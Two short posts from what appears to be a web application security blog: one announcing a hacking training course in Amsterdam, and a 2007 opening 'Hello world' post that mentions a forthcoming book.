I'm going to be co-presenting a training course in Amsterdam next week. Though I say it myself, the course should be pretty fun. As well as all the usual web app stuff, we're going to cover some more entertaining hacks like reversing Java applets and Flash. If you want to know how to cheat at online poker whilst you're supposed to be doing a pen test, this course is perfect for you. Anyone who happens to be there, please do come and say hello.

Saturday, March 10, 2007

Hello world

I realise that this may be somewhat late in the day to be starting a blog about web application security, especially given that you would expect all of that stuff to have been sorted out by now. But two pertinent facts are that (a) I am prone to prolonged periods of inactivity; and (b) I will shortly have a new book to pimppromote. There is certainly still much to say that is interesting and even fun, so please expect future posts to be rather more noteworthy than this one. In the meantime, hello web app world.